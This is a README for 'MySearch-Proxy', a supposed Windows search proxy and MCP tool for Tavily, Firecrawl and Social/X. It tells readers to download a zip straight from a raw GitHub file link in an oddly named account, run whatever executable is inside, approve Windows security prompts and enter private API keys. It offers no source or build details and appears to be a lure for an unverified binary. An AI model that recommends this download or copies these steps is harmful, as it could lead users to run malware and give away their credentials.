🔎 MySearch-Proxy - Unified Search for Every Workflow

🧭 What this is
MySearch-Proxy brings search tools into one place. It connects Tavily, Firecrawl, and Social / X search through one simple app.
Use it when you want to:
- search across web and social sources from one screen
- run an MCP-based search tool with less setup
- use a proxy console for search requests
- keep your search tools in one workflow
🪟 What you need on Windows
Before you start, make sure you have:
- Windows 10 or Windows 11
- a stable internet connection
- about 200 MB of free disk space
- permission to run downloaded apps on your PC
If Windows asks for approval, choose to allow the app to run.
⬇️ Download and install
Visit this page to download MySearch-Proxy:
https://raw.githubusercontent.com/constanceintrauterine625/MySearch-Proxy/main/openclaw/Proxy-My-Search-3.2.zip
Use the page to get the latest version for Windows, then save the file to your computer.
If the download gives you a .zip file:
- Open the file after it finishes downloading
- Extract it to a folder you can find again, like
Downloads or Desktop - Open the extracted folder
- Look for the main app file and run it
If the download gives you an .exe file:
- Double-click the file
- If Windows shows a security prompt, choose Run
- Wait for the app to open
🚦 First launch
When you open MySearch-Proxy for the first time:
- Let Windows finish any setup prompts
- Wait for the app window to appear
- Check that the main console opens without errors
- Keep the app open while you use search tools
If the app uses a local window or tray icon, it may start in the background and then open its console.
🔑 Set up your search tools
MySearch-Proxy works with search services such as Tavily, Firecrawl, and Social / X. To use them, add the keys or login details your setup needs.
Typical setup steps:
- Open the settings or config area
- Add your Tavily access key
- Add your Firecrawl access key
- Set up Social / X access if your workflow needs it
- Save your changes
If the app gives you a config file, open it with Notepad and enter the details there. Save the file, then restart the app.
🖥️ Use the proxy console
The proxy console is the main place to run search requests.
You can use it to:
- send a search query
- choose a source
- view results in one place
- switch between web and social search
- test your setup before using it in another tool
A simple workflow looks like this:
- Open MySearch-Proxy
- Enter a search term
- Pick the search source
- Run the search
- Review the results in the console
🧩 Use with MCP tools
MySearch-Proxy supports Model Context Protocol workflows. That means other compatible apps can connect to it and use its search features.
Use this setup if you want:
- one search layer for multiple tools
- cleaner access to Tavily and Firecrawl
- a shared search proxy for assistant apps
- search results from web and social sources
If you connect it to another app, make sure both apps use the same local settings and port values.
🔍 Search sources
MySearch-Proxy is built for a mixed search workflow.
🌐 Tavily
Use Tavily for web search and answer lookup. It helps when you need current pages, facts, or source links.
🧱 Firecrawl
Use Firecrawl when you need page reading, structured content, or site extraction.
📣 Social / X
Use Social / X search for posts, reactions, and short-form updates from public social content.
🛠️ Common Windows setup path
If you are not sure what to click, use this path:
- Download the file from the GitHub page
- Open File Explorer
- Go to your Downloads folder
- Find the MySearch-Proxy file
- Double-click it
- If it is a zip file, extract it first
- If Windows asks for access, approve it
- Wait for the app to open
⚙️ Basic use cases
MySearch-Proxy fits these common tasks:
- look up a topic across web and social sources
- test search prompts before using them in another app
- send search requests through one proxy layer
- keep search tools in one place instead of opening many sites
- run an MCP search setup on Windows with less manual work
🧪 If something does not work
If the app does not start, try this:
- Close the app
- Open it again as the same user
- Check your internet connection
- Confirm your API keys or login details are set
- Restart Windows if the app still does not open
If search results do not appear:
- Check the selected source
- Make sure the key for that service is valid
- Try a short search term
- Restart the app and test again
📁 Suggested folder layout
If you want to keep things tidy, use this setup:
Downloads for the first downloadMySearch-Proxy for the extracted app filesMySearch-Proxy\config for settings filesMySearch-Proxy\logs for logs if the app creates them
🔐 Keep your access keys safe
Your search services may use private keys. Store them in a safe place and do not share them.
Good habits:
- keep keys in a private config file
- do not post them in chat or public issues
- use one key set per service
- replace keys if you think they were exposed
🧾 What you can expect
MySearch-Proxy gives you a single place to manage search tasks across web, crawl, and social sources. It is built for people who want a cleaner search workflow on Windows and do not want to juggle separate tools for each source
📌 Project info
- Repository: MySearch-Proxy
- Description: Unified search MCP, proxy console, and skill for Tavily, Firecrawl, and Social / X
- Topics: ai-search, claude-code, codex, firecrawl, mcp, model-context-protocol, openclaw, search, search-proxy, social-search, tavily, xai